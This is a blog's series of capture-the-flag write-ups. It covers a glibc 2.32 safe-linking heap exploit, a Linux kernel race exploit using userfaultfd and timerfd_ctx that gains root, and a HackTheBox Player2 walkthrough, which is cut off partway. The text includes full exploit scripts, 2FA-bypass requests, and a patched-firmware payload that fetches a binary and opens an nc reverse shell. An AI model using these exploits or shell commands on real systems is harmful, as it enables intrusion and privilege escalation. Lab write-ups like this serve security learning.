One important concept to note about glibc 2.32 is the new mechanism of safe linking on the singly linked lists. This new protection scheme is discussed in depth here. Basically, for singly linked freelists (fastbins and tcache bins), free chunk fds are obfsucated by the following scheme: (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer). With a heap leak, this protection can be easily bypassed as heap behavior in glibc is predictable, which is what this challenge will revolve around. Bruteforcing or  leaking a copy of the stored pointer and applying some basic crypto knowledge can help you recover the original data as well in some cases (especially when the chunks in the list are close together).

In this challenge, we were given a libc with debug symbols, linker, and patchelf'd binary with the following protections:

Now, when reversing this binary, one should find 4 features. 

You can fill a glass, examine a glass, drain a glass, and switch the contents of the glass according to the menu. There is also an initial sigalarm in the beginning, and you can only have a maximum of 25 glasses. Filling a glass is equivalent to an allocation; it finds an index in the global glasses array for you, requests for a size that is in the range of 0x60 and larger fastbin sizes, and reads in some data. Examining a glass can be useful for leakage, as it just puts() the content of the chunk out; note that examinations can only be used twice (which can be assumed to be for a libc leak and a heap leak). Draining is the equivalent of a free and it is safe as it nulls out the pointer in the global array. You can use this feature as many times as you can, but once you swap contents (feature 4), you can only free one more time. As for the swap function, you can use it to free a chunk, and then immediately reallocate based on 2 choices for sizes. After the allocation, the binary reads in 8 bytes. This where the 8 byte UAF comes in as the conditional is poorly written, so if you select an invalid choice, there will be no re-allocation and you will be reading into the freed chunk's metadata (take a look at the decompilation below). Now let's plan out our exploit:

One might make the mistake of thinking of using swap to create a double free, but the 8 byte UAF won't allow you to change tcache keys so freeing that chunk again will fail a malloc() check. Some might think about filling tcache and then applying a fastbin dup attack, but the fact that you can only free one more time after swapping prevents the bypass against the fastbin double free check. 

To obtain a leak, one might be tempted to just free a chunk and then reallocate it to see the obfuscated pointer (and then shift left by 12 bits to recover heap base). However, the read call during the allocation requires at least one byte (unless pty is enabled server side), so 5 nibbles of the heap address will be missing. This means there would be 1 byte of entropy on the leak, but a proof of work is required for 3 bytes of a random sha256 hash on remote, so bruteforcing isn't as feasible.

A better way to obtain a leak is to abuse the behavior of scanf. When scanf reads in large payloads of characters that follow it's format specifier, scanf will begin to allocate from the heap. For example, if we send in 0x500 '1's, scanf will make a largebin allocation request from the heap. As one familiar with the heap might know, triggering largebin sized allocations will lead to malloc_consolidate() (source), which will go through the freed fastbins and consolidate them to unsorted (source). This malloc_consolidate() is the basis for another type of attack known as fastbin consolidation, which is discussed here in better depth. After malloc_consolidate(), the request for the large allocation will then cause the chunk in unsorted to be sorted into largebin. On the next request, one can use it to request a heap leak. The chunk will then be sorted into unsorted, from which we can easily grab a heap leak (feel free to debug this out when I attach my exploit later on if this seems confusing). This method of leaking really only came up after my teammate c3bacd17 found an unintentional bypass in one of my other challenges.

Once we have the leak, some basic math will allow you to abuse the 8 byte UAF to maliciously corrupt the obfuscated pointer. Note that 2.32 malloc()'s safe linking mechanism also ensures that the deobfuscated pointer is aligned. Because of this and the fastbin size check, we can no longer do the unaligned trick here for fastbin dup. We will have to rely on tcache poisoning here, and an evil obfsucated pointer can be created by xoring the address location of the fd right shifted by 12 bits with the target location.

I ended up targeting __free_hook and changed it to system, then "freed" a chunk with the string "/bin/sh" on it to pop a shell. As for the proof of work on remote, it can easily be handled by the proofofwork python library that automatically generates a proof.

The following is my final exploit with comments:

from pwn import *
import proofofwork
elf = ELF('./dr_xorisaurus')
libc = ELF('./')
# p = process(['disable_sigalarm', elf.path])
p = remote('', 9200)
proof = p.recv(0x22).split(' ')[-2][:-1]'Proving based on: %s' % proof)
proof = proofofwork.sha256(proof)'Proof: %s' % proof)
p.sendline(proof)'Starting pwn')
def wait():
def alloc(size, data):
def show(idx):
def free(idx):
def uaf(idx, data):
def trigger_consolidate(size):
assert(size >= 0x500)
#creating and freeing enough fastbins to help give us largebin when triggering malloc_consolidate with scanf()
for i in range(20):
alloc(0x77, 'aaaaaa')
#leaving 1 unfreed to prevent top consolidation
for i in range(19): #leaves idx 19
#should get a largebin now
alloc(0x60, 'A' * 16)
heapleak = u64(p.recv(6).ljust(8, '\x00')) + 0xf6'heap leak: 0x%x' % heapleak)
alloc(0x60, '')
libc.address = u64(p.recv(6).ljust(8, '\x00')) - 0x1b8c0a'libc base: 0x%x' % libc.address)
#bypassing safe linking
alloc(0x50, '')
alloc(0x50, '')
#P' = (L >> 12) ^ P
#L is address, P is the pointer it should hold
evil_obfs = ((heapleak + 0x60) >> 12) ^ (libc.symbols['__free_hook'])
free(1) #need more than one because tcache count
alloc(0x50, '')
uaf(0, p64(evil_obfs))
alloc(0x50, '')
alloc(0x50, p64(libc.symbols['system']))
alloc(0x60, '/bin/sh')

Hope everyone enjoyed this challenge and writeup! Feel free to let me know if anything needs to be clarified or if anything explained is incorrect. Congrats to lms of Dakota State for blooding this challenge as well!

For those interested in trying this challenge out, it is archived in the CUCTF repos.

CUCTF 2020 Hotrod Kernel Writeup (Userfaultfd Race + Kernel UAF + Timerfd_Ctx Overwrite)

Recently, I made some pwn challenges for my teammate Chirality, who helped organize CUCTF 2020; Dr. Xorisaurus (glibc 2.32 heap) and Hotrod (kernel heap and race). I thought it would be nice to share my writeups for each. You should also check out Chirality's kernel heap challenge for CUCTF, called BYOD.

Before I start, I would like to acknowledge and give appropriate credit to all the links (posted throughout this article) I studied off of to make both this challenge and my exploit possible.

If you have done plenty of glibc heap exploitation before, there is one important idea you should note about kernel heap exploitation. Rather than relying completely on kernel heap feng shui (even though the allocators are much simpler in kernel), it's oftentimes better to utilize certain structures with function pointers for leaks and RIP control. The basis of this challenge is to use a race condition to create a UAF scenario, from which you can hijack timerfd_ctx structures to take control of RIP.

Opening this challenge up, it looks like a standard kernel pwn setup. A file system, bzImage, and a qemu launch script is given. The following two commands will be very handy for manipulating the file system for debugging/analysis purposes:

find . | cpio --create --format='newc' > ../initramfs.cpio
cpio -id < initramfs.cpio
The qemu launch script is the following:

qemu-system-x86_64 \
-s \
-m 64M \
-nographic \
-kernel "./bzImage" \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr nosmap min_addr=4096" \
-no-reboot \
-cpu qemu64,+smep \
-monitor /dev/null \
-initrd "./initramfs.cpio" \
-smp 2 \
-smp cores=2 \
-smp threads=1
This tells us that SMEP, KPTI, and KASLR is enabled, but there is no SMAP (which simplifies this a lot).

We can also use vmlinux-extract to help extract the kernel from its compressed file. The driver itself is hotrod.ko based on the startup script (and the name of the challenge). Now, let's do a quick analysis of the driver.

Like many other standard CTF kernel challenges, a miscdevice is created during initialization and a mutex is also initialized. The device also has a file_operations struct where only the unlocked_ioctl field is populated. Looking through hotrod_ioctl, one can also infer that there is a global struct storing both the size as an unsigned long and a pointer to an allocated chunk located at 0x7e0 relative to module base. This function also has an add, show, delete, and edit function, all of which can only be used once (and you only get one hotrod total). Alloc occurs when the ioctl argument is 0xBAADC0DE.

It checks if you have already attempted an allocation and if the hotrod has already been populated. If not, it will allocate a chunk for the hotrod and sets its size to the argument passed in (the size must fall within the 0xd0 to 0xe0 range). There doesn't seem to be a bug here. Delete occurs when the ioctl argument is 0xC001C0DE.

Again, proper checks are ensured, and the hotrod is zeroed out. This feature can also only be used once. Viewing occurs with ioctl command 0x1337C0DE.

Again, it seems quite safe. We can use this for a leak after we allocate and free certain kernel structures though since kmalloc() doesn't zero out memory. Lastly, edit occurs with argument 0xDEADC0DE.

Again, it seems pretty safe. Like the viewing function, the argument is interpreted as like a hotrod struct as well. The sizes for editing (as well for viewing earlier on) are both checked (so no going out of bounds or overflows). In edit's case, if the size check is satisfactory, it will proceed to copy the user's data to the kernel hotrod's car. 

Overall, this module looks quite safe. Where exactly could the bug be? Well, in this ioctl handler, the mutexes were never used, opening this up to race conditions.

Due to the checks on sizes and restriction to only use each feature once, a good race strategy would be to launch edit in one thread, and in another thread, quickly free the chunk and allocate another kernel structure in a way where the second copy_from_user() happens such that the chunk is already freed but the pointer to the chunk is also already passed to the function. A great way to reliably race is with the userfaultfd syscall. With userfaultfd, we can set up a page fault handler over a certain page we mmap in userspace; even when a pagefault occurs for the kernel accessing it, our handler will run, from which we can hang the kernel thread, run the code meant for the race, and then unblock it with a UFFDIO_COPY ioctl where uffdio_copy.mode is not set. This is actually an extremely common technique to reliably race in the kernel, with several articles and CTF challenges including this concept (such as the famous Balsn CTF KrazyNote challenge):

There does seem to a recent hardening against this method of attack as mentioned here, but is not set by default for compatibility reasons.

From our exploit's perspective, we can have one thread call edit and have it copy over a user hotrod struct where the data, or "car," pointer points to a page where we setup a userfaultfd handler for. Then during edit's second copy_from_user(), it will pagefault when it attempts to copy based on our pointer, and our handler will take over from there, from which we can free and allocate other kernel structures over the same region. Then, you can unblock the thread by copying over the data we want placed there. Personally, I kept all the original data with the copy (to avoid corrupting the kernel structure) except for one of the function pointers, which I change to a stack pivot. Now, after the unblock, the code resumes and everything goes back to "normal," until the overwritten function pointer is triggered.

Due to our structure size, many of the common structures can't be used. However, timerfd_ctx can be quite a useful struct; we can allocate it with a timerfd_create() with the CLOCK_REALTIME option (other options will also work) and a timerfd_settime() call. Using this structure, we can both get a leak and control RIP via the location that stores the function pointer to timerfd_tmrproc(). The function pointer executes after a certain time period which you can control in the itimerspec struct. This structure has been documented before in both ptr-yudai's article about useful kernel structures, this paper about exploitable structures, and GNote from TokyoWesterns 2019. Note that for me, any subsequent sleep calls with the corrupted structure would fail, so I hung the thread to wait for the function pointer to trigger with a getchar().

To grab a leak, I had to spray these structs in the same kmalloc slabs. Then, I freed the last sprayed chunk and immediately made hotrod allocate data there for us to grab the leak reliably. With the KASLR leak, we can rebase the entire kernel relative to startup_64 symbol in kallsyms and then use the aforementioned race to change the function pointer to a stack pivot gadget; we can pivot it to a userspace stack as there is no SMAP. Note that you need to specify a valid range for ropper/ROPGadget to search for gadgets; otherwise, it'll find gadgets that aren't in executable sections in the kernel. Take a look at the example below:

readelf -Wl vmlinux
Elf file type is EXEC (Executable file)
Entry point 0x1000000
There are 4 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
LOAD 0x200000 0xffffffff81000000 0x0000000001000000 0x6bc950 0x6bc950 R E 0x200000
LOAD 0xa00000 0xffffffff81800000 0x0000000001800000 0x050000 0x050000 RW 0x200000
LOAD 0xa50000 0xffffffff81850000 0x0000000001850000 0x07a1cb 0x1cc000 RWE 0x200000
NOTE 0x8bc914 0xffffffff816bc914 0x00000000016bc914 0x00003c 0x00003c 0x4
Section to Segment mapping:
Segment Sections...
00 .text .rodata .pci_fixup __ksymtab __ksymtab_gpl __ksymtab_strings __param __modver __ex_table .notes
01 .data _kprobe_blacklist .vvar
02 .init.text .altinstr_aux .x86_cpu_dev.init .altinstructions .altinstr_replacement .iommu_table .apicdrivers .exit.text .bss .brk
03 .notes
ROPgadget --binary vmlinux --range 0xffffffff81000000-0xFFFFFFFF816BC950

Since there is KPTI and SMEP, the traditional SMEP bypass of changing the CR4 register won't work; KPTI fully isolates user page tables from kernel page tables by managing the two sets via the 12th bit of the CR3 register (the userspace portion of kernel page tables is set to NX, and the only additional information given to userspace page tables is the information necessary to enter and exit the kernel). Instead, it is better to rely on a kpti trampoline and have it fix the CR3 for us so we can go back (swapgs_restore_regs_and_return_to_usermode); these functionalities exist in the kernel because it needs to handle this for routines like syscalls. I usually add +0x16 to where this is located, just so I can skip all the initial pops and start right at movq %rsp, %rdi. Using this trampoline combined with a commit_creds(init_cred) to change my uid to 0 beforehand, I can then choose whichever function to return to in my userspace code with root privileges. Of course, I needed to specify the cs, ss, r_flags, and stack (specifically, at that location, it expects RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS) for the trampoline to return to as well; I just used the values I saved beforehand in the userspace process.

In my case, I was not able to execve or perform many other functions without causing a kernel panic, so I ended up doing open read write in my function. I also had to just halt the OS; otherwise, the kernel panics on the return, hangs, and then somehow spikes my CPU usage to 100%. I'm not too sure why that happened, so if you know why, please let me know.

Below is my exploit with comments and linked resources:

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/timerfd.h>
#include <pthread.h>
#include <poll.h>
#include <sys/reboot.h>
#define ALLOC 0xBAADC0DE
#define EDIT 0xDEADC0DE
#define FREE 0xC001C0DE
#define SHOW 0x1337C0DE
#define TIMERFD_TMPROC_OFFSET 0x102a00
#define COMMIT_CREDS_OFFSET 0x537d0
#define INIT_CRED_OFFSET 0x837620
#define XCHG_EAX_ESP_OFFSET 0x89ff2
#define POP_RDI_OFFSET 0xb689d
#define KPTI_TRAMPOLINE_OFFSET 0x200cb0 + 0x16 //, + 0x16 to skip regs
#define MOV_RAX_RDI_AND_RAX_OFFSET 0x17bab // mov rax, rdi ; and rax, 0xfffffffffffffff0 ; ret
#define POP_RCX_OFFSET 0x18a8d3
#define POP_R11_POP_R12_POP_RBP_OFFSET 0x8b7d
// gcc exploit.c -o exploit -static -pthread -masm=intel
// transfer with b64 + gzip
// dumped values from kernel module with printk because elixir showed them as layers of nested macros
#define UFFDIO_API 0xc018aa3f
#define UFFDIO_REGISTER 0xc020aa00
#define UFFDIO_COPY 0xc028aa03
typedef struct
unsigned long size;
char *data;
static int fd;
static pthread_t thread;;
static unsigned long long leaks[0x100/8];
static unsigned long long kbase, timerfd_tmrproc, commit_creds, init_cred, xchg_eax_esp, pop_rdi, kpti_trampoline;
static unsigned long long addr;
// ioctl wrapper
int ioctl(int fd, unsigned long request, unsigned long param)
return syscall(16, fd, request, param);
// helper functions
int alloc(int fd, unsigned long size)
return ioctl(fd, ALLOC, size);
int delete(int fd)
return ioctl(fd, FREE, 0);
int edit(int fd, unsigned long size, char *src)
req_t req;
req.size = size; = src;
return ioctl(fd, EDIT, &req);
int show(int fd, unsigned long size, char *dest)
req_t req;
req.size = size; = dest;
return ioctl(fd, SHOW, &req);
// function to return to once we become root
void pwned()
int flag_fd;
char flag[0x50];
printf("uid: %d\n", getuid());
flag_fd = open("/flag", O_RDONLY);
read(flag_fd, flag, 0x50);
// based on
// based on
void *racer(void *arg)
struct uffd_msg uf_msg;
struct uffdio_copy uf_copy;
long uffd = (long)arg;
struct pollfd pollfd;
int nready;
pollfd.fd = uffd; = POLLIN;
while(poll(&pollfd, 1, -1) > 0)
if(pollfd.revents & POLLERR || pollfd.revents & POLLHUP)
perror("polling error");
// reading the event
if(read(uffd, &uf_msg, sizeof(uf_msg)) == 0)
perror("error reading event");
if(uf_msg.event != UFFD_EVENT_PAGEFAULT)
perror("unexpected result from event");
puts("caught a race");
puts("triggering a deletion");
struct itimerspec timespec = {{10, 0}, {10, 0}};
int tfd = timerfd_create(CLOCK_REALTIME, 0);
timerfd_settime(tfd, 0, &timespec, 0);
puts("allocated timerfd_ctx struct");
// now copy over edit data
char uf_buffer[0x1000];
struct uffdio_copy uf_copy;
leaks[5] = xchg_eax_esp;
memset(uf_buffer, 0, sizeof(uf_buffer));
memcpy(uf_buffer, &leaks, 0x30);
uf_copy.src = uf_buffer;
uf_copy.dst = addr;
uf_copy.len = 0x1000;
uf_copy.mode = 0;
uf_copy.copy = 0;
if(ioctl(uffd, UFFDIO_COPY, &uf_copy) == -1)
perror("uffdio_copy error");
puts("race successfully finished");
while (1)
return 0;
void register_userfault()
int uffd, race;
struct uffdio_api uf_api;
struct uffdio_register uf_register;
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
uf_api.api = UFFD_API;
uf_api.features = 0;
// creating userfaultfd for race condition because using unlocked_ioctl without locking mutexes
if (ioctl(uffd, UFFDIO_API, &uf_api) == -1)
perror("error with the uffdio_api");
// page for userfaultfd
if (mmap(addr, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0) != addr)
perror("whoopsie doopsie on mmap");
uf_register.range.start = addr;
uf_register.range.len = 0x1000;
// uffd will change when the kernel thread page faults here and hangs
if (ioctl(uffd, UFFDIO_REGISTER, &uf_register) == -1)
perror("error registering page for userfaultfd");
race = pthread_create(&thread, NULL, racer, (void*)uffd);
if(race != 0)
perror("can't setup threads for race");
int main(int argc, char **argv)
fd = open("/dev/hotrod", O_RDWR);
if (fd < 0)
perror("failed opening device");
// spray to increase exploit reliability
for (int i = 0; i < 0x100; i++)
struct itimerspec timespec = {{0, 0}, {100, 0}};
int tfd = timerfd_create(CLOCK_REALTIME, 0);
timerfd_settime(tfd, 0, &timespec, 0);
puts("finished initial spray");
struct itimerspec timespec = {{10, 0}, {10, 0}};
int tfd = timerfd_create(CLOCK_REALTIME, 0);
// refer to usage of this for leaks
timerfd_settime(tfd, 0, &timespec, 0);
alloc(fd, 0xe0);
show(fd, 0xe0, &leaks);
timerfd_tmrproc = leaks[5];
kbase = timerfd_tmrproc - TIMERFD_TMPROC_OFFSET;
init_cred = kbase + INIT_CRED_OFFSET;
commit_creds = kbase + COMMIT_CREDS_OFFSET;
xchg_eax_esp = kbase + XCHG_EAX_ESP_OFFSET;
pop_rdi = kbase + POP_RDI_OFFSET;
kpti_trampoline = kbase + KPTI_TRAMPOLINE_OFFSET;
printf("Kernel base: 0x%llx\n", kbase);
printf("init_cred: 0x%llx\n", init_cred);
printf("commit_creds: 0x%llx\n", commit_creds);
printf("xchg_eax_esp: 0x%llx\n", xchg_eax_esp);
printf("pop_rdi: 0x%llx\n", pop_rdi);
printf("kpti_trampoline: 0x%llx\n", kpti_trampoline);
// mmap page for rop chain
unsigned long pivot_target = xchg_eax_esp & 0xffffffff;
unsigned long *fake_stack = mmap(pivot_target & 0xfffff000, 0x50000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_POPULATE, 0, 0);
if (fake_stack == -1)
perror("fake stack mmap error");
// saving state
unsigned long long user_rflags, user_cs, user_ss, user_sp;
asm volatile(
"mov %0, %%cs\n"
"mov %1, %%ss\n"
"mov %2, %%rsp\n"
"pop %3\n"
: "=r" (user_cs), "=r" (user_ss), "=r" (user_sp), "=r" (user_rflags)
// rop chain to make me root and return to pwned
unsigned long long rop[] =
(unsigned long)pwned,
memcpy((void *)pivot_target, rop, sizeof(rop));
puts("finished writing rop chain to mmap'd page");
// now trigger userfaultfd race
addr = 0x10000;
puts("finished registering userfaultfd page for race condition");
puts("triggering userfaultfd");
edit(fd, 0x30, addr);
view raw exploit.c hosted with ❤ by GitHub

To transfer the exploit to the remote instance, I just compiled it statically with gcc, gzip'd it, and then transfered with base64 encoding and cat > exploit << EOF. It was still relatively large and took about 7 minutes to transfer, but if one really was working under time constraints, compiling with a more minimalistic library like musl or uclibc could help. Here's the final result:

If I made any mistakes in my explanations above, feel free to let me know so I can correct them. I'm still continuing to study the Linux kernel and find it quite fascinating! Thanks again to CUCTF for hosting the event!

For those interested in trying this problem out, it is archived in the CUCTF repos.

Saturday, June 27, 2020

Player2 HacktheBox Writeup

Player2 was a challenging but very fun box by MrR3boot and b14ckh34rt. The highlight of the box for me is the finale 2.29 heap pwn!  In my opinion, if there were no unintended routes, this would have been by far the hardest box so far, but some of these alternative solutions were never patched.

On the intial enum, we find on player2.htb a link to product.player2.htb regarding the Protobs product.  It's a login page, so it's time to hopefully find some creds.  On an initial nmap port scan, we also find the following ports: 22, 80, 8545.  Going to port 8545, we see an invalid twirp route message, giving away the fact that twirp is used on this box. While dirbing player2.htb, we also come across the proto directory.  Documentation at this point basically told me what to do:

From the proto directory, let's try to find some configuration info by fuzzing for the .proto file.  Using some different wordlists with wfuzz on /proto/FUZZ.proto, I came across generated.proto:

syntax = "proto3";

package twirp.player2.auth;
option go_package = "auth";

service Auth {
  rpc GenCreds(Number) returns (Creds);

message Number {
  int32 count = 1; // must be > 0

message Creds {
  int32 count = 1;
  string name = 2;
  string pass = 3;

Note how twirp documentation mentions the route as the following:

POST /twirp/<package>.<Service>/<Method>

From the source above, the route will be twirp.player2.auth.Auth/GenCreds... some nice credentials should come from here!

Using the twirp documentation with curl, I played around and curled to the service route based on the format from the documentation.

curl -X POST "http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds" --header "Content-Type:application/json" --data '{}'

However, we end up getting a lot of different creds and most of them don't work.  I recieved the following:

With some different varaitions, I determined that the following worked:

However, once we login, it asks for OTP.  It tells us that we can either use the OTP that was sent to mobile or backup codes.  I did notice an initial api link from dirb originally.  This page is called totp, which is a type of otp.  Thinking logically, plugging in /api/totp actually worked.  It also mentioned backup codes.  Playing around, there seems to be “action” parameter on the api.  After a while, I figured out that sending in the logged in session id along with a request for “backup_codes” (a logical name for what we are looking for) gave us the TOTP. 

curl -X POST "http://product.player2.htb/api/totp" --header "Content-Type:application/json" -d '{"action":"backup_codes"}' --cookie "PHPSESSID=06plq8egcf5e8eijvhs8abjs7q"


After rooting the box, hevr pointed out that there should be a type juggling attack here as the 2FA bypass:

curl -X POST "http://product.player2.htb/api/totp" --header "Content-Type:application/json" -d '{"action":0}' --cookie "PHPSESSID=06plq8egcf5e8eijvhs8abjs7q"

Inside the following page, we see a mention to a pdf and a link to a firmware download.  It mentions that the firmware is signed.  Extracting the binary file from the tar, I opened it up in a hex editor and saw the ELF header appear 64 bytes into the file.  It seems safe here to assume that the first 64 bytes is probably the signature.  Let's take out the first 64 bytes: dd if=Protobs.bin bs=64 skip=1 of=firmware.

While reversing it, I noticed how the main function called another function, which in turn called system on a string.

0x004013c9      55             push rbp
|           0x004013ca      4889e5         mov rbp, rsp
|           0x004013cd      4883ec10       sub rsp, 0x10
|           0x004013d1      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=-1 ; '(' ; 40
|           0x004013da      488945f8       mov qword [local_8h], rax
|           0x004013de      31c0           xor eax, eax
|           0x004013e0      488d3dbd0c00.  lea rdi, qword str.stty_raw__echo_min_0_time_10 ; 0x4020a4 ;
 "stty raw -echo min 0 time 10"
|           0x004013e7      e884fcffff     call sym.imp.system         ; int system(const char *string)
|           0x004013ec      e8bffcffff     call sym.imp.getchar        ; int getchar(void)
|           0x004013f1      8945f4         mov dword [local_ch], eax
|           0x004013f4      837df41b       cmp dword [local_ch], 0x1b
|       ,=< 0x004013f8      7416           je 0x401410
|       |   0x004013fa      488d3dc00c00.  lea rdi, qword str.stty_sane ; 0x4020c1 ; "stty sane"
|       |   0x00401401      e86afcffff     call sym.imp.system         ; int system(const char *string)
|       |   0x00401406      bf00000000     mov edi, 0
|       |   0x0040140b      e8c0fcffff     call sym.imp.exit

We can patch binaries with dd to call system on a different string and then reattach the 64 byte signature:

First, finding the offset to the first string with stty.
strings -t d Protobs.bin | grep stty

Then, I created a “malicious” file for the next dd to transfer into and replace the string.  It contained the following contents:
curl | bash

The “z” on my side is just a shellscript containing the following:
curl -o /tmp/nc
chmod +x /tmp/nc
/tmp/nc 1337 -e /bin/sh

The reason I kept the original command so small was because I was being cautious about messing up the binary with a string that is too long.

Then, lastly, with the final patching:
dd if=malicious of=Protobs.bin obs=1 seek=8420 conv=notrunc

Uploading this should pop us a shell back as www-data.
Looking in /etc/passwd, there are two potential users to go for: egre55 and observer.  I also noticed that there is an account for the mosquitto service.  The service is also running on port 1883.  Reading around, the SYS-topic part of it was quite interesting.

To quote the article, SYS topics are a special class of topics under which the broker publishes data, typically for monitoring purposes. SYS topics are not a formal standard but are an established practice in MQTT brokers.

Going to it with the following command:
mosquitto_sub -h localhost -p 1883 -v -t '$SYS/#'

We end up seeing an SSH key getting dumped after a while:


Testing it on the two possible users, it turned out that it works for observer.  And now user has been pwned!  

Finally, we have hit the part for root.  It's a poison null byte on 2.29 (there also was an easier heap overflow unintended).  Anyways, make sure to read up on libc malloc.c for 2.29 on bminor's mirror of libc source before continuing!  The binary can be found in /opt/Configuration_Utility, and running checksec on it immediately informs us that it is patchelf'd to run ld and libc different from the box's libc and ld.  Personally, I like to use all of pwndbg's capabilities with libc debug symbols, so I ran the following commands to switch the interpreter and rpath to default and debugged on a headless ubuntu VM running the same libc version:

patchelf Protobs --set-interpreter /lib64/
patchelf Protobs --remove-rpath /lib/x86_64-linux-gnu/

Anyways, let us begin the pwning!  Here is the binary reversed with my comments.

//only 15 indices

typedef struct
  char[20] game;
  unsigned int contrast;
  unsigned int gamma;
  unsigned int xres;
  unsigned int yres;
  unsigned int controller;
  unsigned int desc;
  char *description;

void create(void)
  char *__dest;
  long lVar1;
  int iVar2;
  undefined4 uVar3;
  void *pvVar4;
  ssize_t sVar5;
  size_t sVar6;
  long in_FS_OFFSET;
  int local_448;
  char local_428 [19];
  undefined local_415;
  long local_20;
  local_20 = *(long *)(in_FS_OFFSET + 0x28);
  iVar2 = FUN_00400c8b();
  if (iVar2 < 0) {
  pvVar4 = malloc(0x38); //so default, allocate to 0x40 tcachebin, note libc 2.29
  *(void **)(&DAT_00603060 + (long)iVar2 * 8) = pvVar4;
  __dest = *(char **)(&DAT_00603060 + (long)iVar2 * 8);
  puts("==New Game Configuration");
  printf(" [ Game                ]: ");
  local_415 = 0;
  uVar3 = readnum(" [ Contrast            ]: ");
  *(undefined4 *)(__dest + 0x14) = uVar3;
  uVar3 = readnum(" [ Gamma               ]: ");
  *(undefined4 *)(__dest + 0x18) = uVar3;
  uVar3 = readnum(" [ Resolution X-Axis   ]: ");
  *(undefined4 *)(__dest + 0x1c) = uVar3;
  uVar3 = readnum(" [ Resolution Y-Axis   ]: ");
  *(undefined4 *)(__dest + 0x20) = uVar3;
  uVar3 = readnum(" [ Controller          ]: ");
  *(undefined4 *)(__dest + 0x24) = uVar3;
  uVar3 = readnum(" [ Size of Description ]: "); //not nulled out another bug here!
  *(undefined4 *)(__dest + 0x28) = uVar3;
  if (*(int *)(__dest + 0x28) != 0) {
    printf(" [ Description         ]: ");
    sVar5 = read(0,local_428,0x200);
    if (*(uint *)(__dest + 0x28) <= (uint)sVar5) {
      local_428[(ulong)*(uint *)(__dest + 0x28)] = 0;
    pvVar4 = malloc((ulong)*(uint *)(__dest + 0x28));
    *(void **)(__dest + 0x30) = pvVar4; //another allocation
    lVar1 = *(long *)(__dest + 0x30);
    local_448 = 0;
    while( true ) {
      sVar6 = strlen(local_428); //counts all the way till null byte
      //what happenned above allows for poison null byte, it's copying strlen bytes rather than desc size bytes
      if (sVar6 < (ulong)(long)local_448) break;
      *(char *)((long)local_448 + lVar1) = local_428[(long)local_448];
      local_448 = local_448 + 1;
  if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */

void delete(void)
  long lVar1;
  void *__ptr;
  uint uVar2;
  long in_FS_OFFSET;
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  puts("==Delete Game Configuration");
  puts(" >>> Run the list option to see available configurations.");
  uVar2 = readnum(" [ Config Index    ]: ");
  if ((uVar2 < 0xf) && (*(long *)(&DAT_00603060 + (ulong)uVar2 * 8) != 0)) {
    __ptr = *(void **)(&DAT_00603060 + (ulong)uVar2 * 8);
    if (*(long *)((long)__ptr + 0x30) != 0) {
      free(*(void **)((long)__ptr + 0x30)); 
    *(undefined8 *)(&DAT_00603060 + (ulong)uVar2 * 8) = 0; 
  else {
    puts("  [!] Invalid index.");
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */

void readin(char *pcParm1)
  long lVar1;
  char *pcVar2;
  long in_FS_OFFSET;
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  pcVar2 = strchr(pcParm1,0xd);
  if (pcVar2 != (char *)0x0) {
    *pcVar2 = 0;
  pcVar2 = strchr(pcParm1,10);
  if (pcVar2 != (char *)0x0) {
    *pcVar2 = 0;
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */

ulong readnum(char *pcParm1)
  ulong uVar1;
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  uVar1 = strtol(local_28,(char **)0x0,10);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
  return uVar1 & 0xffffffff;

void show(void)
  long lVar1;
  long lVar2;
  uint uVar3;
  long in_FS_OFFSET;
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  puts("==Read Game Configuration");
  puts(" >>> Run the list option to see available configurations.");
  uVar3 = readnum(" [ Config Index    ]: ");
  if ((uVar3 < 0xf) && (*(long *)(&DAT_00603060 + (ulong)uVar3 * 8) != 0)) {
    lVar2 = *(long *)(&DAT_00603060 + (ulong)uVar3 * 8);
    printf("  [ Game                ]: %s\n",lVar2);
    printf("  [ Contrast            ]: %u\n",(ulong)*(uint *)(lVar2 + 0x14));
    printf("  [ Gamma               ]: %u\n",(ulong)*(uint *)(lVar2 + 0x18));
    printf("  [ Resolution X-Axis   ]: %u\n",(ulong)*(uint *)(lVar2 + 0x1c));
    printf("  [ Resolution Y-Axis   ]: %u\n",(ulong)*(uint *)(lVar2 + 0x20));
    printf("  [ Controller          ]: %u\n",(ulong)*(uint *)(lVar2 + 0x24));
    if (*(long *)(lVar2 + 0x30) != 0) {
      printf("  [ Description         ]: %s\n",*(undefined8 *)(lVar2 + 0x30));
  else {
    puts("  [!] Invalid index.");
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */

void list(void)
  long lVar1;
  long in_FS_OFFSET;
  uint local_1c;
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  puts("==List of Configurations");
  local_1c = 0;
  while (local_1c < 0xf) {
    if (*(long *)(&DAT_00603060 + (ulong)local_1c * 8) != 0) {
      printf(" [%02u] : %s\n",(ulong)local_1c,*(undefined8 *)(&DAT_00603060 + (ulong)local_1c *8));
    local_1c = local_1c + 1;
